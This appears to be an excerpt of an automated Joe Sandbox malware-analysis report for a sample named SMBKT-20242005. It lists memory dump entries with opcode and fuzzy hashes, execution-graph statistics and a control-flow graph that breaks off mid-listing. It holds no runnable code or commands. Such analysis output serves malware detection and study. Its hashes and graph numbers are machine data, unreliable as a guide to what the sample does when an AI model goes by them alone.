                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: Y6fU$p,
                          • API String ID: 0-262289562
                          • Opcode ID: 9b56abbfb3e0a7f687b74385f9d7311290423fbf3c3fa1001a269ba374940dcf
                          • Instruction ID: dd24f23c544c497eb1ba2e338f5b89a5916db2d1bfa25e659f18f65f9041732c
                          • Opcode Fuzzy Hash: 9b56abbfb3e0a7f687b74385f9d7311290423fbf3c3fa1001a269ba374940dcf
                          • Instruction Fuzzy Hash: F44106B1E0521ADFCF08CFAAC9815EEFBB6EB88300F24D56AC555B7204D7709A418F94
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: Y6fU$p,
                          • API String ID: 0-262289562
                          • Opcode ID: 578b7df6e4f42758baebf588b114a516a5920c6eb651a17178386b6f5fca1242
                          • Instruction ID: 6e361a187dd96b4d2927b1f0a6ee2e9ff5742116bba4318754f43ff9651fb1f0
                          • Opcode Fuzzy Hash: 578b7df6e4f42758baebf588b114a516a5920c6eb651a17178386b6f5fca1242
                          • Instruction Fuzzy Hash: 464106B5E0521A9FCF08CFAAC5815EEFBB2EB88300F24D56AC555B7214D7709A418B94
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: &)
                          • API String ID: 0-3972312975
                          • Opcode ID: b2c9174c6ab8c852e4930c17a9f1af35fb9bb6989e10825f63f5b44061b04b1f
                          • Instruction ID: bd4ef7b26657bbe3da7d572064ae5b52ab08b96b05b901356006014514cec44e
                          • Opcode Fuzzy Hash: b2c9174c6ab8c852e4930c17a9f1af35fb9bb6989e10825f63f5b44061b04b1f
                          • Instruction Fuzzy Hash: 375137B2E01219DFCF04CFA9D9806EEFBB2EF88301F14942AD464A7251D7749A42CF95
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: p
                          • API String ID: 0-2181537457
                          • Opcode ID: 8a7ba3e94eb207a17b671d8d60c1a57fad2b5ada8ec80a105affbd524d046757
                          • Instruction ID: e3ec378f2753df4237279a894bf15a3ab354acaefa8dd47eb65e9ccf39671a75
                          • Opcode Fuzzy Hash: 8a7ba3e94eb207a17b671d8d60c1a57fad2b5ada8ec80a105affbd524d046757
                          • Instruction Fuzzy Hash: 9551E671E01319CFEB58CF6AC94078AFBB3BF89201F04D5A9D448AB215D7709A85CF55
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6cc6fb730c3a7861aaef78bd6e39faa4a59658ceae0ad0e015aa5c676ef9cc87
                          • Instruction ID: 5e88f205a81d944feb6f71efd4e007ea5e4c45b07ebb570c8468d1f39cf3cc2d
                          • Opcode Fuzzy Hash: 6cc6fb730c3a7861aaef78bd6e39faa4a59658ceae0ad0e015aa5c676ef9cc87
                          • Instruction Fuzzy Hash: 80E11775E002198FDB14DFA8C580AAEFBB2FF89305F248569D454AB356DB70AD41CFA0
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6136536c874189a504d54afa434b19229256ba6c2192b76835df8fd7e8254fd8
                          • Instruction ID: 4396e2ffea04b345d851f2935b39666eb6912a4b2a83f5f134946e2af4d1a238
                          • Opcode Fuzzy Hash: 6136536c874189a504d54afa434b19229256ba6c2192b76835df8fd7e8254fd8
                          • Instruction Fuzzy Hash: 43E1F974E002198FDB25DFA8C9809AEFBF2FF89305F248569D514AB356D730A941CFA0
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d3f5f32d24317b472f3a9509e37d06d6c0119e243808d57ca3d92772f571263b
                          • Instruction ID: 179a1593ac535536285d271a4f7bffdf9439e942f3ce7ce00e3dcfce27b269e7
                          • Opcode Fuzzy Hash: d3f5f32d24317b472f3a9509e37d06d6c0119e243808d57ca3d92772f571263b
                          • Instruction Fuzzy Hash: E9E1D674E002198FDB24DFA8C980AAEFBB2FF89305F2485A9D554AB355D731AD41CF60
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 382cab0d8734a24acace2cca4670a6c49792adccbd05e596107022448aabb9ff
                          • Instruction ID: 0ede936e5427e09e86da326071e40a72a27ef5354b968131b7052ba484728f49
                          • Opcode Fuzzy Hash: 382cab0d8734a24acace2cca4670a6c49792adccbd05e596107022448aabb9ff
                          • Instruction Fuzzy Hash: C0E1E674E002198FDB25DFA9C980AAEFBF2FF89305F248569D514AB356D730A941CF60
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 124e286297debd4fc260a247783a837ab516cbcb8c15260e6e68d7a2afe7f145
                          • Instruction ID: 223cd490a35200ff0e20d75943501a0a9f72f6f17e0203c29bdd6a48cda05dce
                          • Opcode Fuzzy Hash: 124e286297debd4fc260a247783a837ab516cbcb8c15260e6e68d7a2afe7f145
                          • Instruction Fuzzy Hash: B0E1E674E002198FDB25DFA9C980AAEFBF2FF89305F248569D514AB356D730A941CF60
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 51dcdd42884718e2bd3694b404f2336b4d7a9281576c8b2a2aca35718a98bbd8
                          • Instruction ID: 1c4c6dc4878ea9a91cdae73e42e95a8b76f894a60c35999c56c84b179bb4b97a
                          • Opcode Fuzzy Hash: 51dcdd42884718e2bd3694b404f2336b4d7a9281576c8b2a2aca35718a98bbd8
                          • Instruction Fuzzy Hash: 64D1A374A00605CFDB18DF69C998AA9B7F1BF4C701F2680A9E549AB361DB31AD41CF60
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62dca108fc5301f4c60093962ff15476a768dc815a737778bc55b4cedb38dc32
                          • Instruction ID: c98df7e3092dcd36633a4a19b2cf1d2a2bb5ef574a422370afd23c807331f78b
                          • Opcode Fuzzy Hash: 62dca108fc5301f4c60093962ff15476a768dc815a737778bc55b4cedb38dc32
                          • Instruction Fuzzy Hash: E2E1043292075A8BCB11EBA4D854ADDB7B1FF95310F10C79AE4493B215FB70AAC4CB91
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7d83b02e1848e8d9ed65b25e4f935a1346c0ac4377f77f71671726dc69576b75
                          • Instruction ID: b1beab64f5d8e1f21c19ee788321e7fcd2d9cade287d0737f700558fd0a29df4
                          • Opcode Fuzzy Hash: 7d83b02e1848e8d9ed65b25e4f935a1346c0ac4377f77f71671726dc69576b75
                          • Instruction Fuzzy Hash: AED1F531920B5A8BCB11EBA4D854ADDB7B1FF95300F10C79AE4093B215FB70AAC4CB91
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 91bac71d23db307362bf588858dcbdbc3198a13a86a1e3f1a767145cb49e0fa2
                          • Instruction ID: 1bc48de96bcc47bafe9f3c30e9e105c92985b479ce7de1e5371319357329e09c
                          • Opcode Fuzzy Hash: 91bac71d23db307362bf588858dcbdbc3198a13a86a1e3f1a767145cb49e0fa2
                          • Instruction Fuzzy Hash: 8BA17132E00219CFCF26DFB9C84059EBBB6FF84304B1545BAE916AB265DB35D905CB40
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fda63d027a63d8f8a136cf65e891753208647589b18cff36e3409b378f47b808
                          • Instruction ID: 7a2d22c32458a1bde7939671dffb9b91cade2c4e72efade0d06b6886d2aae356
                          • Opcode Fuzzy Hash: fda63d027a63d8f8a136cf65e891753208647589b18cff36e3409b378f47b808
                          • Instruction Fuzzy Hash: 27A128B0E05219DFDB18DFE6D8805AEFBB2FF89300F14956AD515AB264EB349902DF10
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5697ecb6020644463c9c10b5adf3b13e54bdcd943ecde1508cf24cb895cf499
                          • Instruction ID: 6bc0c173d0739889a9aaeceb87079ec8e355d9bfd08445b626d89722cd9013c0
                          • Opcode Fuzzy Hash: e5697ecb6020644463c9c10b5adf3b13e54bdcd943ecde1508cf24cb895cf499
                          • Instruction Fuzzy Hash: ABA107B0E05219DFDB18DFE6D8805AEFBB2FF89300F10952AD515AB254EB35A902DF10
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 820aa479481738f7fe7e41cb4a335a23e5c14a8fdd3349e390f34d12c5ce9c9a
                          • Instruction ID: fe86f680ed79ff86542a19dd3560e81368b1302d92a6a4505331894d57393a6d
                          • Opcode Fuzzy Hash: 820aa479481738f7fe7e41cb4a335a23e5c14a8fdd3349e390f34d12c5ce9c9a
                          • Instruction Fuzzy Hash: 2781F075E11219CFCB04DFA9C58499EFBF2FF88311F24A56AD419AB221C374AA42CF51
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4da2506c7d9d3d948b9b3b343c95a86c07e96744bd3002647470b8cda5b8f9c1
                          • Instruction ID: a452d640374fba6aeb001906a834cac0dc33abc96811164dec07c8115514f2d2
                          • Opcode Fuzzy Hash: 4da2506c7d9d3d948b9b3b343c95a86c07e96744bd3002647470b8cda5b8f9c1
                          • Instruction Fuzzy Hash: 30811075E11209CFCB44CFA9C58489EFBF2FF88311B24A56AE415AB321D374AA42CF51
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aaeade58730625b092860e939c2d7bf79585ddb871d7e2d44034642d69b978f9
                          • Instruction ID: a312faf3f81549fee627fbbba9008954af046533bca0569c5f319765cd4a0bde
                          • Opcode Fuzzy Hash: aaeade58730625b092860e939c2d7bf79585ddb871d7e2d44034642d69b978f9
                          • Instruction Fuzzy Hash: FE61F675E052198FCF04CFA9C9809EEFBF2FF89211F28A46AD445B7224D7749A41CB64
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a612dcd16c15256e394b88428ba31c681c7617a60c870db1a6b366b416657c38
                          • Instruction ID: 345ffc708cc0c877e1f27435fc9d5585ba9747e7151ca5b17ce3faccae713ca5
                          • Opcode Fuzzy Hash: a612dcd16c15256e394b88428ba31c681c7617a60c870db1a6b366b416657c38
                          • Instruction Fuzzy Hash: 7261F775E052198FCF04CFA9D9809EEFBF2FF89211F28A46AD405B7214D7749A41CB64
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cdc6ce7b01a7cd0a17302a48815fb656e1c400a636c5437f8fbc1ba48e1dddcc
                          • Instruction ID: a9a9b23b146ffd8d49b546e518a35a7735f80c8bd3ef1864b0a77c2b61130823
                          • Opcode Fuzzy Hash: cdc6ce7b01a7cd0a17302a48815fb656e1c400a636c5437f8fbc1ba48e1dddcc
                          • Instruction Fuzzy Hash: 99611A71E002298FDB14DF6AD980AAEFBF6BF89304F14C5AAD848A7315D7309941CF61
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c99ca83db4b0ab157331d529cc8df840b7be4548ed46c8ca18bcfedb93f052af
                          • Instruction ID: 12438100ff1faa97f7ce12725e4016e8d20712b3d6ea14989f2ff5e5ac3d39d1
                          • Opcode Fuzzy Hash: c99ca83db4b0ab157331d529cc8df840b7be4548ed46c8ca18bcfedb93f052af
                          • Instruction Fuzzy Hash: 8D5103B5E0521ACFCF04CFA8C98099EFBF2FB89311F14956AD445AB315C374A941CBA5
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c582bc120f3c542f2f3553648ca9c7db3af2ef4fc85a683b28dca4170e494c8e
                          • Instruction ID: 7864888f438e3547926c8e344503a72c8b3790d174538c61b44c3755b56963e3
                          • Opcode Fuzzy Hash: c582bc120f3c542f2f3553648ca9c7db3af2ef4fc85a683b28dca4170e494c8e
                          • Instruction Fuzzy Hash: E0518871E057558FEB19CF6B8D4528ABBF3AFC9300F18C1BAC448AA265EB3409468F11
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e6cd9096129f4c5f26c2bfb7bf5d7ab641d5841d1e4b34fa6cad1c090934a0a1
                          • Instruction ID: 5112d820dc51d86e8dc6abb89aca47dca854f32e1a30cdb5dd583d297eff83a1
                          • Opcode Fuzzy Hash: e6cd9096129f4c5f26c2bfb7bf5d7ab641d5841d1e4b34fa6cad1c090934a0a1
                          • Instruction Fuzzy Hash: 5C41FA75E006189FEB18DFAAD840ADEBBB7BFC9300F14C4AAD408A7264DB7449418F61
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a2432e08641e448cd9691ec8094653da084ede668ae74ae29f7609bfb3f7e64f
                          • Instruction ID: 9e90064246e4b1a4d7eb31d29b0b1d5e96f9db6452b69ae154e314a291bae952
                          • Opcode Fuzzy Hash: a2432e08641e448cd9691ec8094653da084ede668ae74ae29f7609bfb3f7e64f
                          • Instruction Fuzzy Hash: 73416C71E116188BEB28DF6B8D4439EFBF7BFC9300F14C1BA950CA6215EB3019858E15
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e720aec4b75873a263242da1296db8f5216b922437277c035d85aac145295814
                          • Instruction ID: a2a666a25e1a08b6a4acf91e6b113f40cf3902a0668edaf4cccc688208f36f30
                          • Opcode Fuzzy Hash: e720aec4b75873a263242da1296db8f5216b922437277c035d85aac145295814
                          • Instruction Fuzzy Hash: 4F41E6B1E0421A9FDF08CFAAC8805EEFBF2AB88301F24D169C455B7254D7759A418F94
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4211fd4d583eb4f9c2f8fe804aa1059f5e6122858d783d6d2b2eaa56a0ffc3f5
                          • Instruction ID: 47f5b81e1637f1378de8d50a7e4a7f9d3416c29df3d14acb0b5c8b6f7fa5557e
                          • Opcode Fuzzy Hash: 4211fd4d583eb4f9c2f8fe804aa1059f5e6122858d783d6d2b2eaa56a0ffc3f5
                          • Instruction Fuzzy Hash: 84411571E0421A9FDF08CFAAC8405EEFBF2AF89300F24D06AC455B7254D7749A418F54
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a9b9ba7c88f683560684fa83913f5ec393d26f37d84c3aeb6ba5e336ddfad6a
                          • Instruction ID: c5b278186463a0f1e0bd29b587cd2ebc9ecb9239d6837d8e15e67fa41967b564
                          • Opcode Fuzzy Hash: 6a9b9ba7c88f683560684fa83913f5ec393d26f37d84c3aeb6ba5e336ddfad6a
                          • Instruction Fuzzy Hash: 4E31E7B5E006189BEB18CFABC8407DEBAF7BFC9300F14C57AD848A6264EB7449418F55
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 581da61a3c57976568d110712e0e4a7c4e0ec8cfe780f681c6f102c66ffb081d
                          • Instruction ID: ca5e2b4277df0beee95ed673c1e4ad501222722e31dce0844855c68797e621ba
                          • Opcode Fuzzy Hash: 581da61a3c57976568d110712e0e4a7c4e0ec8cfe780f681c6f102c66ffb081d
                          • Instruction Fuzzy Hash: E5213671E116598BDB08CFABD940A9EFBF7AFC9300F18C06AD408A7215EB345A028B55

                          Execution Graph

                          Execution Coverage: 12.1%
                          Dynamic/Decrypted Code Coverage: 100%
                          Signature Coverage: 0%
                          Total number of Nodes: 17
                          Total number of Limit Nodes: 4
                          execution_graph 22925 1490848 22926 149084e 22925->22926 22927 149091b 22926->22927 22929 149138f 22926->22929 22931 1491393 22929->22931 22930 14914a4 22930->22926 22931->22930 22933 1497fa0 22931->22933 22934 1497faa 22933->22934 22935 1497fc4 22934->22935 22938 6bbfa8f 22934->22938 22942 6bbfaa0 22934->22942 22935->22931 22940 6bbfab5 22938->22940 22939 6bbfcca 22939->22935 22940->22939 22941 6bbfce0 GlobalMemoryStatusEx 22940->22941 22941->22940 22944 6bbfab5 22942->22944 22943 6bbfcca 22943->22935 22944->22943 22945 6bbfce0 GlobalMemoryStatusEx 22944->22945 22945->22944
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43b1cb5f9e7c01b40f490b428be7892718f8fac952e241ab83dbea1ed224e2d5
                          • Instruction ID: cb419fee88aa7dacc8a9bbec0cc60aa73c8710c244121aed2b074d1228c94c3d
                          • Opcode Fuzzy Hash: 43b1cb5f9e7c01b40f490b428be7892718f8fac952e241ab83dbea1ed224e2d5
                          • Instruction Fuzzy Hash: A4627E74B002049FDB54DB68D594ABDB7F2EF88315F14A4AAD406DB390EBB5EC41CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1142 6bbc1f0-6bbc210 1143 6bbc212-6bbc215 1142->1143 1144 6bbc217-6bbc230 1143->1144 1145 6bbc235-6bbc238 1143->1145 1144->1145 1146 6bbc23a-6bbc25f 1145->1146 1147 6bbc264-6bbc267 1145->1147 1146->1147 1148 6bbc269-6bbc28e 1147->1148 1149 6bbc293-6bbc296 1147->1149 1148->1149 1152 6bbc309-6bbc312 1149->1152 1153 6bbc298-6bbc29b 1149->1153 1154 6bbc41b-6bbc424 1152->1154 1155 6bbc318 1152->1155 1157 6bbc29d-6bbc2ae 1153->1157 1158 6bbc2b3-6bbc2b6 1153->1158 1163 6bbc42a-6bbc431 1154->1163 1164 6bbc583-6bbc598 1154->1164 1159 6bbc31d-6bbc320 1155->1159 1157->1158 1161 6bbc2b8-6bbc2dc 1158->1161 1162 6bbc2e1-6bbc2e4 1158->1162 1166 6bbc34b-6bbc34e 1159->1166 1167 6bbc322-6bbc346 1159->1167 1161->1162 1169 6bbc2e6-6bbc2ff 1162->1169 1170 6bbc304-6bbc307 1162->1170 1171 6bbc436-6bbc439 1163->1171 1186 6bbc59a-6bbc5bd 1164->1186 1187 6bbc52c-6bbc53f 1164->1187 1174 6bbc35b-6bbc35e 1166->1174 1175 6bbc350-6bbc356 1166->1175 1167->1166 1169->1170 1170->1152 1170->1159 1176 6bbc43b-6bbc43e 1171->1176 1177 6bbc443-6bbc446 1171->1177 1180 6bbc3c0-6bbc3c3 1174->1180 1181 6bbc360-6bbc3bb 1174->1181 1175->1174 1176->1177 1184 6bbc448-6bbc44d 1177->1184 1185 6bbc450-6bbc453 1177->1185 1191 6bbc3cd-6bbc3d0 1180->1191 1192 6bbc3c5-6bbc3c8 1180->1192 1181->1180 1184->1185 1188 6bbc465-6bbc468 1185->1188 1189 6bbc455-6bbc45e 1185->1189 1193 6bbc5bf-6bbc5c2 1186->1193 1207 6bbc544-6bbc547 1187->1207 1199 6bbc46a-6bbc483 1188->1199 1200 6bbc488-6bbc48b 1188->1200 1196 6bbc4b9-6bbc4c2 1189->1196 1197 6bbc460 1189->1197 1202 6bbc3dd-6bbc3e0 1191->1202 1203 6bbc3d2-6bbc3d8 1191->1203 1192->1191 1194 6bbc5e5-6bbc5e8 1193->1194 1195 6bbc5c4-6bbc5e0 1193->1195 1208 6bbc5ea-6bbc603 1194->1208 1209 6bbc608-6bbc60b 1194->1209 1195->1194 1196->1164 1213 6bbc4c8-6bbc4cc 1196->1213 1197->1188 1199->1200 1210 6bbc48d-6bbc492 1200->1210 1211 6bbc495-6bbc498 1200->1211 1205 6bbc3e2-6bbc3e9 1202->1205 1206 6bbc3f0-6bbc3f3 1202->1206 1203->1202 1205->1176 
1224 6bbc3eb 1205->1224 1225 6bbc416-6bbc419 1206->1225 1226 6bbc3f5-6bbc411 1206->1226 1216 6bbc559-6bbc55c 1207->1216 1217 6bbc549-6bbc554 1207->1217 1208->1209 1221 6bbc60d-6bbc61b 1209->1221 1222 6bbc622-6bbc625 1209->1222 1210->1211 1219 6bbc49a-6bbc4a9 1211->1219 1220 6bbc4b4-6bbc4b7 1211->1220 1223 6bbc4d1-6bbc4d4 1213->1223 1228 6bbc55e-6bbc561 1216->1228 1229 6bbc566-6bbc568 1216->1229 1217->1216 1219->1228 1251 6bbc4af 1219->1251 1220->1196 1220->1223 1232 6bbc627-6bbc640 1221->1232 1252 6bbc61d 1221->1252 1231 6bbc64d-6bbc650 1222->1231 1222->1232 1233 6bbc4fd-6bbc500 1223->1233 1234 6bbc4d6-6bbc4f8 1223->1234 1224->1206 1225->1154 1225->1171 1226->1225 1228->1229 1240 6bbc56a 1229->1240 1241 6bbc56f-6bbc572 1229->1241 1238 6bbc65d-6bbc65f 1231->1238 1239 6bbc652-6bbc65c 1231->1239 1257 6bbc66f-6bbc67b 1232->1257 1268 6bbc642-6bbc64c 1232->1268 1245 6bbc518-6bbc51b 1233->1245 1246 6bbc502-6bbc513 1233->1246 1234->1233 1247 6bbc661 1238->1247 1248 6bbc666-6bbc669 1238->1248 1240->1241 1241->1143 1250 6bbc578-6bbc582 1241->1250 1245->1189 1255 6bbc521-6bbc524 1245->1255 1246->1245 1247->1248 1248->1193 1248->1257 1251->1220 1252->1222 1255->1207 1260 6bbc526 1255->1260 1261 6bbc81a-6bbc824 1257->1261 1262 6bbc681-6bbc68a 1257->1262 1260->1187 1266 6bbc690-6bbc6af 1262->1266 1267 6bbc825-6bbc85e 1262->1267 1280 6bbc808-6bbc814 1266->1280 1281 6bbc6b5-6bbc6be 1266->1281 1273 6bbc860-6bbc863 1267->1273 1274 6bbc869-6bbc877 1273->1274 1275 6bbca1f-6bbca22 1273->1275 1282 6bbc87e-6bbc880 1274->1282 1278 6bbca45-6bbca47 1275->1278 1279 6bbca24-6bbca40 1275->1279 1283 6bbca49 1278->1283 1284 6bbca4e-6bbca51 1278->1284 1279->1278 1280->1261 1280->1262 1281->1267 1285 6bbc6c4-6bbc6f3 call 6bb6608 1281->1285 1287 6bbc882-6bbc885 1282->1287 1288 6bbc897-6bbc8c1 1282->1288 1283->1284 1284->1273 1289 6bbca57-6bbca60 1284->1289 1301 6bbc735-6bbc74b 1285->1301 1302 6bbc6f5-6bbc72d 1285->1302 1287->1289 1296 6bbc8c7-6bbc8d0 1288->1296 1297 6bbca14-6bbca1e 1288->1297 1299 
